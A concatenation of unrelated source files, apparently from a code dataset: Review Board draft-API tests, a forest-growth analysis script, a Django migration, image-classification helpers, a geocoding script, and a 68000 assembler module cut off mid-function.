self.assertEqual(review_request.submitter.username, "doc")
self.assertTrue(review_request.public)
def test_put_publish_with_new_review_request(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API
with a new review request
"""
# Set some data first.
review_request = self.create_review_request(submitter=self.user)
review_request.target_people = [
User.objects.get(username='doc')
]
review_request.save()
self._create_update_review_request(self.api_put, 200,
review_request)
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject,
"Review Request %s: My Summary" % review_request.pk)
self.assertValidRecipients(["doc", "grumpy"], [])
def test_put_as_other_user_with_permission(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with permission
"""
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
self._test_put_as_other_user()
def test_put_as_other_user_with_admin(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with admin
"""
self._login_user(admin=True)
self._test_put_as_other_user()
@add_fixtures(['test_site'])
def test_put_as_other_user_with_site_and_permission(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with local site and permission
"""
self.user = self._login_user(local_site=True)
local_site = self.get_local_site(name=self.local_site_name)
site_profile = self.user.get_site_profile(local_site)
site_profile.permissions['reviews.can_edit_reviewrequest'] = True
site_profile.save(update_fields=('permissions',))
self._test_put_as_other_user(local_site)
@add_fixtures(['test_site'])
def test_put_as_other_user_with_site_and_admin(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with local site and admin
"""
self.user = self._login_user(local_site=True, admin=True)
self._test_put_as_other_user(
self.get_local_site(name=self.local_site_name))
def test_put_with_invalid_submitter(self):
"""Testing the PUT review-requests/<id>/draft/ API with an invalid
submitter
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'submitter': 'invalid',
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertTrue('submitter' in rsp['fields'])
def test_put_with_publish_and_trivial(self):
"""Testing the PUT review-requests/<id>/draft/ API with trivial
changes
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'public': True,
'trivial': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 0)
@add_fixtures(['test_scmtools'])
def test_put_with_publish_and_signal_handler_with_queries(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API with
review_request_published signal handlers needing to fetch latest
changedescs/diffsets
"""
# We had a bug where diffset and changedesc information was cached
# prior to publishing through the API, and was then stale when handled
# by signal handlers. This change checks to ensure that state is
# always fresh.
def _on_published(review_request, *args, **kwargs):
# Note that we're explicitly checking all() and not count() here
# and below, because this is what was impacted by the bug before.
self.assertEqual(len(review_request.changedescs.all()),
expected_changedesc_count)
self.assertEqual(
len(review_request.diffset_history.diffsets.all()),
expected_diffset_count)
expected_changedesc_count = 0
expected_diffset_count = 0
review_request_published.connect(_on_published, weak=True)
try:
self.spy_on(_on_published)
review_request = self.create_review_request(submitter=self.user,
create_repository=True)
draft_url = get_review_request_draft_url(review_request)
# First, we're going to try publishing an initial draft. There
# should be 1 diffset upon publish, and 0 changedescs.
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
diffset = self.create_diffset(review_request, draft=True)
self.create_filediff(diffset)
self.assertEqual(len(review_request.changedescs.all()),
expected_changedesc_count)
self.assertEqual(
len(review_request.diffset_history.diffsets.all()),
expected_diffset_count)
expected_diffset_count += 1
rsp = self.api_put(
draft_url,
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(_on_published.spy.called)
_on_published.spy.reset_calls()
# Now try posting an update. There should be 1 changedesc, 2
# diffsets.
diffset = self.create_diffset(review_request, draft=True)
self.create_filediff(diffset)
expected_changedesc_count += 1
expected_diffset_count += 1
rsp = self.api_put(
draft_url,
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(_on_published.spy.called)
finally:
review_request_published.disconnect(_on_published)
def test_put_with_publish_with_first_draft_as_other_user(self):
"""Testing the PUT review-requests/<id>/draft/ API with first draft
as other user (with can_edit_reviewrequest after submit-as)
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
target_people=[user])
ReviewRequestDraft.create(review_request)
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'public': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_put_with_publish_with_publish_as_owner(self):
"""Testing the PUT review-requests/<id>/draft/ API with
publish_as_owner=
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
publish=True,
target_people=[user])
ReviewRequestDraft.create(review_request)
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
'public': True,
'publish_as_owner': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, 'New summary')
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_put_with_numeric_extra_data(self):
"""Testing the PUT review-requests/<id>/draft/ API with numeric
extra_data values
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'extra_data.int_val': 42,
'extra_data.float_val': 3.14159,
'extra_data.scientific_val': 2.75e-15
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp['draft']
extra_data = draft_rsp['extra_data']
self.assertEqual(extra_data['int_val'], 42)
self.assertEqual(extra_data['float_val'], 3.14159)
self.assertEqual(extra_data['scientific_val'], 2.75e-15)
def test_get_or_create_user_auth_backend(self):
"""Testing the PUT review-requests/<id>/draft/ API
with AuthBackend.get_or_create_user failure
"""
class SandboxAuthBackend(AuthBackend):
backend_id = 'test-id'
name = 'test'
def get_or_create_user(self, username, request=None,
password=None):
raise Exception
backend = SandboxAuthBackend()
self.spy_on(auth.get_backends, call_fake=lambda: [backend])
# The first spy messes with permissions, this lets it through
self.spy_on(ReviewRequest.is_mutable_by,
owner=ReviewRequest,
call_fake=lambda x, y: True)
self.spy_on(backend.get_or_create_user)
review_request = self.create_review_request(
submitter=self.user)
ReviewRequestDraft.create(review_request)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'Target',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertTrue(backend.get_or_create_user.called)
@add_fixtures(['test_scmtools'])
@webapi_test_template
def test_put_created_with_history_public_unfinalized_series(self):
"""Testing the PUT <URL> API with public=1 for a review request
created with commit history support that has an unfinalized diffset
"""
with override_feature_check(dvcs_feature.feature_id, enabled=True):
review_request = self.create_review_request(
create_with_history=True,
create_repository=True,
submitter=self.user)
diffset = self.create_diffset(review_request, draft=True)
draft = review_request.get_draft()
self.create_diffcommit(diffset=diffset)
draft.target_people = [review_request.submitter]
draft.save()
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_status=500)
self.assertEqual(rsp, {
'stat': 'fail',
'err': {
'code': PUBLISH_ERROR.code,
'msg': 'Error publishing: This commit series is not '
'finalized.',
},
})
# If the draft still exists we indeed did not publish!
self.assertTrue(
ReviewRequestDraft.objects.filter(pk=draft.pk).exists())
@add_fixtures(['test_scmtools'])
@webapi_test_template
def test_put_created_with_history_public_finalized_series(self):
"""Testing the PUT <URL> API with public=1 for a review request
created with commit history support that has a finalized diffset
"""
with override_feature_check(dvcs_feature.feature_id, enabled=True):
review_request = self.create_review_request(
create_with_history=True,
create_repository=True,
submitter=self.user)
diffset = self.create_diffset(review_request, draft=True)
draft = review_request.get_draft()
self.create_diffcommit(diffset=diffset)
draft.target_people = [review_request.submitter]
draft.save()
diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertFalse(ReviewRequestDraft.objects.exists())
def _create_update_review_request(self, api_func, expected_status,
review_request=None,
local_site_name=None):
summary = "My Summary"
description = "My Description"
testing_done = "My Testing Done"
branch = "My Branch"
bugs = "#123,456"
if review_request is None:
review_request = self.create_review_request(submitter=self.user,
publish=True)
review_request.target_people.add(
User.objects.get(username='doc'))
func_kwargs = {
'summary': summary,
'description': description,
'testing_done': testing_done,
'branch': branch,
'bugs_closed': bugs,
}
if expected_status >= 400:
expected_mimetype = None
else:
expected_mimetype = review_request_draft_item_mimetype
rsp = api_func(
get_review_request_draft_url(review_request, local_site_name),
func_kwargs,
expected_status=expected_status,
expected_mimetype=expected_mimetype)
if expected_status >= 200 and expected_status < 300:
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['summary'], summary)
self.assertEqual(rsp['draft']['description'], description)
self.assertEqual(rsp['draft']['testing_done'], testing_done)
self.assertEqual(rsp['draft']['branch'], branch)
self.assertEqual(rsp['draft']['bugs_closed'], ['123', '456'])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, summary)
self.assertEqual(draft.description, description)
self.assertEqual(draft.testing_done, testing_done)
self.assertEqual(draft.branch, branch)
self.assertEqual(draft.get_bug_list(), ['123', '456'])
return rsp
def _create_update_review_request_with_site(self, api_func,
expected_status,
relogin=True,
review_request=None):
if relogin:
self._login_user(local_site=True)
if review_request is None:
review_request = self.create_review_request(submitter='doc',
with_local_site=True)
return self._create_update_review_request(
api_func, expected_status, review_request, self.local_site_name)
def _test_get_with_force_text_type(self, text, rich_text,
force_text_type, expected_text):
url, mimetype, draft = \
self.setup_basic_get_test(self.user, False, None)
draft.description = text
draft.testing_done = text
draft.description_rich_text = rich_text
draft.testing_done_rich_text = rich_text
draft.save()
draft.changedesc.text = text
draft.changedesc.rich_text = rich_text
draft.changedesc.save()
rsp = self.api_get(url + '?force-text-type=%s' % force_text_type,
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIn(self.resource.item_result_key, rsp)
draft_rsp = rsp[self.resource.item_result_key]
self.assertEqual(draft_rsp['description_text_type'], force_text_type)
self.assertEqual(draft_rsp['testing_done_text_type'], force_text_type)
self.assertEqual(draft_rsp['changedescription'], expected_text)
self.assertEqual(draft_rsp['description'], expected_text)
self.assertEqual(draft_rsp['testing_done'], expected_text)
self.assertNotIn('raw_text_fields', draft_rsp)
rsp = self.api_get('%s?force-text-type=%s&include-text-types=raw'
% (url, force_text_type),
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('raw_text_fields', draft_rsp)
raw_text_fields = draft_rsp['raw_text_fields']
self.assertEqual(raw_text_fields['changedescription'], text)
self.assertEqual(raw_text_fields['description'], text)
self.assertEqual(raw_text_fields['testing_done'], text)
def _test_get_with_custom_and_force(self, source_text, rich_text,
force_text_type, expected_text,
custom_field_supports_markdown):
"""Helper function to test custom fields and ``?include-text-types=``.
This will test GET requests of custom text fields in two alternative
formats (one fixed as ``raw`` and the other controlled by
``force_text_type``) via the ``?include-text-types=`` query parameter.
Args:
source_text (unicode):
Text to use as source data for fields being tested.
rich_text (bool):
Whether ``source_text`` is rich text.
force_text_type (unicode):
Value for ``?force-text-type=`` query parameter. Should be one
of: ``plain``, ``markdown`` or ``html``.
expected_text (unicode):
Expected resultant text after forcing ``source_text`` to
requested format.
custom_field_supports_markdown (bool)
Whether custom field being tested should enable markdown
support.
"""
# Exercise custom fields that support markdown (BaseTextAreaField) and
# those that don't (BaseEditableField). Fields that don't support
# markdown do not get serialized into
# <text_type>_text_fields.extra_data.
if custom_field_supports_markdown:
base = BaseTextAreaField
else:
base = BaseEditableField
class CustomField(base):
# Utilize "text" as the field_id because it is a special case and
# results in a text type field named "text_type".
field_id = 'text'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(CustomField)
try:
url, mimetype, draft = \
self.setup_basic_get_test(self.user, False, None)
source_text_type = "markdown" if rich_text else "plain"
draft.description = source_text
draft.description_rich_text = rich_text
draft.extra_data['text'] = source_text
if custom_field_supports_markdown:
draft.extra_data['text_type'] = source_text_type
draft.save()
rsp = self.api_get(url + '?force-text-type=%s' % force_text_type,
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIn(self.resource.item_result_key, rsp)
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('extra_data', draft_rsp)
extra_data = draft_rsp['extra_data']
self.assertEqual(draft_rsp['description_text_type'],
force_text_type)
self.assertEqual(draft_rsp['description'], expected_text)
self.assertNotIn('raw_text_fields', draft_rsp)
if custom_field_supports_markdown:
# Ensure the name of the text_type field has not been
# formulated incorrectly, since "text" is a special name, and
# thus we expect "text_type" not "text_text_type".
self.assertNotIn('text_text_type', extra_data)
self.assertEqual(extra_data['text'], expected_text)
self.assertEqual(extra_data['text_type'], force_text_type)
else:
self.assertEqual(extra_data['text'], source_text)
self.assertNotIn('text_type', extra_data)
# Exercise including multiple text types via a CSV list.
rsp = self.api_get(
'%s?force-text-type=%s&include-text-types=raw,%s'
% (url, force_text_type, force_text_type),
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('raw_text_fields', draft_rsp)
raw_text_fields = draft_rsp['raw_text_fields']
self.assertEqual(raw_text_fields['description'], source_text)
self.assertEqual(raw_text_fields['description_text_type'],
source_text_type)
other_field_name = '%s_text_fields' % force_text_type
self.assertIn(other_field_name, draft_rsp)
other_text_fields = draft_rsp[other_field_name]
self.assertEqual(other_text_fields['description'], expected_text)
self.assertEqual(other_text_fields['description_text_type'],
force_text_type)
if custom_field_supports_markdown:
self.assertIn('extra_data', raw_text_fields)
extra_data_raw = raw_text_fields['extra_data']
self.assertEqual(extra_data_raw['text'], source_text)
self.assertEqual(extra_data_raw['text_type'], source_text_type)
self.assertIn('extra_data', other_text_fields)
extra_data_other = other_text_fields['extra_data']
self.assertEqual(extra_data_other['text'], expected_text)
self.assertEqual(extra_data_other['text_type'],
force_text_type)
else:
self.assertNotIn('extra_data', raw_text_fields)
self.assertNotIn('extra_data', other_text_fields)
finally:
fieldset.remove_field(CustomField)
def _test_put_with_text_types(self, text_type_field, text_type_value,
expected_change_text_type,
expected_description_text_type,
expected_testing_done_text_type,
expected_custom_field_text_type,
expected_changedesc_update_fields=[],
expected_draft_update_fields=[]):
text = '`This` is a **test**'
class CustomField(BaseTextAreaField):
field_id = 'mytext'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'changedescription': text,
'description': text,
'testing_done': text,
'extra_data.mytext': text,
text_type_field: text_type_value,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp['draft']
extra_data = draft_rsp['extra_data']
self.assertEqual(draft_rsp['changedescription'], text)
self.assertEqual(draft_rsp['description'], text)
self.assertEqual(draft_rsp['testing_done'], text)
self.assertEqual(extra_data['mytext'], text)
self.assertEqual(draft_rsp['changedescription_text_type'],
expected_change_text_type)
self.assertEqual(draft_rsp['description_text_type'],
expected_description_text_type)
self.assertEqual(draft_rsp['testing_done_text_type'],
expected_testing_done_text_type)
self.assertEqual(extra_data['mytext_text_type'],
expected_custom_field_text_type)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.compare_item(draft_rsp, draft)
self.assertTrue(ChangeDescription.save.last_called_with(
update_fields=sorted(['text'] +
expected_changedesc_update_fields)))
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=sorted(['description', 'extra_data',
'last_updated', 'testing_done'] +
expected_draft_update_fields)))
finally:
fieldset.remove_field(CustomField)
def _test_put_as_other_user(self, local_site=None):
review_request = self.create_review_request(
with_local_site=(local_site is not None),
submitter='dopey',
publish=True)
self.assertNotEqual(review_request.submitter, self.user)
ReviewRequestDraft.create(review_request)
if local_site:
local_site_name = local_site.name
else:
local_site_name = None
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site_name),
{
'description': 'New description',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(rsp['draft']['description'], 'New description')
|
StarcoderdataPython
|
3381534
|
<reponame>OneStone2/mcmc_growth<filename>run.py
import argparse
import os.path
import read
import analyze
import numpy as np
import sys
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("state", help="2-letter code for the US state")
argparser.add_argument("--online", dest='online', const=True, default=False, action='store_const', help="Use FIA website")
args = argparser.parse_args()
args.state = [args.state]
if args.state == ['US']:
args.state = ['AL', 'AZ', 'AR', 'CA', 'CO', 'CT', 'DE', 'FL', 'GA', 'ID', 'IL', 'IN', 'IA', 'KS', 'KY', 'LA', 'ME', 'MD', 'MA', 'MI', 'MN', 'MS', 'MO', 'MT', 'NE', 'NV', 'NH', 'NJ', 'NY', 'NC', 'ND', 'OH', 'OK', 'OR', 'PA', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VT', 'VA', 'WV', 'WI']
for state in args.state:
if not (
os.path.isfile('data/'+state+'_2a.csv')
or os.path.isfile('data/'+state+'_2a.csv')
):
if not os.path.isfile('data/'+state+'_1.csv'):
if args.online:
plots = read.parse(state, online=True)
else:
plots = read.parse(state, online=False)
read.cluster_prep_file(plots, state)
read.clean(args.state, b=True)
print 'Analyzing', state
print analyze.analyze_r01(state, human=True, time=True)
print analyze.analyze_r02(state, human=True, time=True)
print analyze.analyze_r03(state, human=True, time=True)
print analyze.analyze_r04(state, human=True, time=True)
|
StarcoderdataPython
|
3479889
|
<gh_stars>0
# Generated by Django 2.0 on 2018-08-30 16:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('directoryentries', '0021_auto_20180822_1037'),
]
operations = [
migrations.AlterField(
model_name='boardmember',
name='city',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_city', to='taxonomy.City'),
),
migrations.AlterField(
model_name='boardmember',
name='state',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_state', to='taxonomy.State'),
),
migrations.AlterField(
model_name='boardmember',
name='zipcode',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_zipcode', to='taxonomy.Zipcode'),
),
migrations.AlterField(
model_name='studentboardmember',
name='building_location',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryentries_studentboardmember_building_location', to='taxonomy.Location'),
),
]
|
StarcoderdataPython
|
9643991
|
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from PIL import Image
from pathlib import Path
from pathlib import Path
import numpy as np
import pandas as pd
from fastai.data.all import get_image_files
from fastai.data.all import get_image_files
from data.load_image import load_image_for_feature_extraction
image_file_extensions = ('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')
def is_image_path_valid(path: Path):
return path.is_file() and path.suffix in image_file_extensions
def load_image_file(path):
return Image.open(path)
def load_image_paths(path: Path):
fns = get_image_files(path)
return fns
def get_contingency_table(df: pd.DataFrame = None, pred_results=None, before_colname="", after_colname="", categories=None, category_names=None):
if df == None:
df = pd.DataFrame(index=category_names)
for cat in category_names:
pred_slice = pred_results[categories == cat]
total = len(pred_slice)
blal = len(pred_slice[(pred_slice[before_colname] == 0) & (
pred_slice[after_colname] == 0)])
blac = len(pred_slice[(pred_slice[before_colname] == 0) & (
pred_slice[after_colname] == 1)])
bcac = len(pred_slice[(pred_slice[before_colname] == 1) & (
pred_slice[after_colname] == 1)])
bcal = len(pred_slice[(pred_slice[before_colname] == 1) & (
pred_slice[after_colname] == 0)])
df.loc[[cat], ['total']] = total
df.loc[[cat], ['blal']] = blal
df.loc[[cat], ['blac']] = blac
df.loc[[cat], ['bcac']] = bcac
df.loc[[cat], ['bcal']] = bcal
total = df.sum()
total.name = 'total'
df = df.append(total.transpose())
return df
def preprocess(path):
return np.expand_dims(load_image_for_feature_extraction(path)[0], 0)
def get_cat(stem):
cat_dict = {
'makeupe': 'makeup',
'hiardoo': 'hairdoo',
'hairdoocut': 'haircut'
}
first_word = stem.split()[0]
if first_word in cat_dict.keys():
return cat_dict[stem]
else:
return first_word
|
StarcoderdataPython
|
6694621
|
#!/usr/bin/env python
# google map url is https://www.google.co.uk/maps/place/41+Rue+de+Villiers,+92200+Neuilly-sur-Seine,+France
# google map api is http://maps.googleapis.com/maps/api/geocode/json?address=41 rue de villiers neuilly sur seine
import requests
addr= raw_input("which address: ")
url='http://maps.googleapis.com/maps/api/geocode/json?address=' + addr
r = requests.get(url)
# r.status_code
# r.json()
print "latitude is " + str(r.json()['results'][0]['geometry']['location']['lat'])
print "longitude is " + str(r.json()['results'][0]['geometry']['location']['lng'])
|
StarcoderdataPython
|
1862901
|
<reponame>rdeioris/necroassembler
from necroassembler import Assembler, opcode
from necroassembler.utils import pack_bits_be16u, pack_be16u, pack_be32u
from necroassembler.exceptions import AssemblerException
class InvalidMode(AssemblerException):
message = 'invalid 68000 mode'
D_REGS = ('d0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7')
A_REGS = ('a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7')
CONDITIONS = ('T', 'F', 'HI', 'LS', 'CC', 'CS', 'NE', 'EQ',
'VC', 'VS', 'PL', 'MI', 'GE', 'LT', 'GT', 'LE')
def _is_immediate(token):
return len(token) > 1 and token.startswith('#')
def _is_displacement(token):
return token.lower() not in D_REGS + A_REGS + ('(', ')') and not token.startswith('#')
def _is_absolute_with_w(token):
return _is_displacement(token) and token.lower().endswith('.w')
def _is_absolute_with_l(token):
return _is_displacement(token) and token.lower().endswith('.l')
def _is_indexed_reg(token):
if token.lower().endswith('.w'):
return token.lower()[0:-2] in D_REGS+A_REGS
if token.lower().endswith('.l'):
return token.lower()[0:-2] in D_REGS+A_REGS
return token in D_REGS+A_REGS
IMMEDIATE = _is_immediate
DISPLACEMENT = _is_displacement
INDEXED_REG = _is_indexed_reg
ABSOLUTE = _is_displacement
ABSOLUTE_W = _is_absolute_with_w
ABSOLUTE_L = _is_absolute_with_l
MODES = ('Dn', 'An', '(An)', '(An)+', '-(An)', '(d16,An)', '(d8,An,Xn)',
'(xxx).W', '(xxx).L', '#<data>', '(d16,PC)', '(d8,PC,Xn)')
def _reg(token):
return int(token[1:])
def _cond(token):
if token[0:2].upper() == 'RA':
return 1
return CONDITIONS.index(token[0:2].upper())
def _indexed_reg(token):
d_or_a = 0 if token.lower().startswith('d') else 1
if token.lower().endswith('.w'):
return d_or_a, _reg(token[0:-2]), 0
if token.lower().endswith('.l'):
return d_or_a, _reg(token[0:-2]), 1
return d_or_a, _reg(token), 0
def _s_light(token):
token = token.lower()
if token.endswith('.b'):
return 1, 0
if token.endswith('.l'):
return 4, 2
if token.endswith('.w'):
return 2, 1
return 2, 1
def _s_dark(token):
token = token.lower()
if token.endswith('.b'):
return 1, 1
if token.endswith('.l'):
return 4, 2
if token.endswith('.w'):
return 2, 3
return 2, 3
def _s_middle(token):
token = token.lower()
if token.endswith('.l'):
return 4, 1
if token.endswith('.w'):
return 2, 0
return 2, 0
class AssemblerMC68000(Assembler):
hex_prefixes = ('$',)
bin_prefixes = ('%',)
big_endian = True
def register_instructions(self):
self.register_instruction('RTS', b'\x4E\x75')
self.register_instruction('NOP', b'\x4E\x71')
def _mode(self, instr, start_index, offset, size, blacklist=()):
# first check the blacklist
for black_item in blacklist:
if black_item not in MODES:
raise InvalidMode(instr)
# Dn
found, index = instr.unbound_match(D_REGS, start=start_index)
if found and 'Dn' not in blacklist:
return index, 0, _reg(instr.tokens[start_index]), b''
# An
found, index = instr.unbound_match(A_REGS, start=start_index)
if found and 'An' not in blacklist:
return index, 1, _reg(instr.tokens[start_index]), b''
# (An)+ must be checked before (An) !
found, index = instr.unbound_match(
'(', A_REGS, ')', '+', start=start_index)
if found and '(An)+' not in blacklist:
return index, 3, _reg(instr.tokens[start_index+1]), b''
# (An)
found, index = instr.unbound_match('(', A_REGS, ')', start=start_index)
if found and '(An)' not in blacklist:
return index, 2, _reg(instr.tokens[start_index+1]), b''
# -(An)
found, index = instr.unbound_match(
'-', '(', A_REGS, ')', start=start_index)
if found and '-(An)' not in blacklist:
return index, 4, _reg(instr.tokens[start_index+2]), b''
# (d16, An)
found, index = instr.unbound_match(
'(', DISPLACEMENT, A_REGS, ')', start=start_index)
if found and '(d16,An)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
signed=True,
offset=2+offset)
return index, 5, _reg(instr.tokens[start_index+2]), pack_be16u(value)
# (d8, An, Xn)
found, index = instr.unbound_match(
'(', DISPLACEMENT, A_REGS, INDEXED_REG, ')', start=start_index)
if found and '(d8,An,Xn)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=8,
bits=(7, 0),
signed=True,
offset=2+offset)
m, xn, s = _indexed_reg(instr.tokens[start_index+3])
return index, 6, _reg(instr.tokens[start_index+2]), pack_bits_be16u(0, ((15, 15), m), ((14, 12), xn), ((11, 11), s), ((7, 0), value))
# (d16, PC)
found, index = instr.unbound_match(
'(', DISPLACEMENT, 'PC', ')', start=start_index)
if found and '(d16,PC)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
relative=self.pc+2+offset,
offset=2+offset)
return index, 7, 2, pack_be16u(value)
# (d8, PC, Xn)
found, index = instr.unbound_match(
'(', DISPLACEMENT, 'PC', INDEXED_REG, ')', start=start_index)
if found and '(d8,PC,Xn)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=8,
bits=(7, 0),
relative=self.pc+2+offset,
offset=2+offset)
m, xn, s = _indexed_reg(instr.tokens[start_index+3])
return index, 7, 3, pack_bits_be16u(0, ((15, 15), m), ((14, 12), xn), ((11, 11), s), ((7, 0), value))
# (xxx).w
found, index = instr.unbound_match(
'(', ABSOLUTE, ')', '.W', start=start_index)
if found and '(xxx).W' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
offset=2+offset)
return index, 7, 0, pack_be16u(value)
# (xxx).l
found, index = instr.unbound_match(
'(', ABSOLUTE, ')', '.L', start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
# #imm
found, index = instr.unbound_match(IMMEDIATE, start=start_index)
if found and '#<data>' not in blacklist:
packed = self._packer(instr.tokens[start_index][1:], size, offset)
return index, 7, 4, packed
# (xxx).w ALIAS addr.w
found, index = instr.unbound_match(ABSOLUTE_W, start=start_index)
if found and '(xxx).W' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index][:-2],
size=2,
bits_size=16,
offset=2+offset)
return index, 7, 0, pack_be16u(value)
# (xxx).l ALIAS addr.l
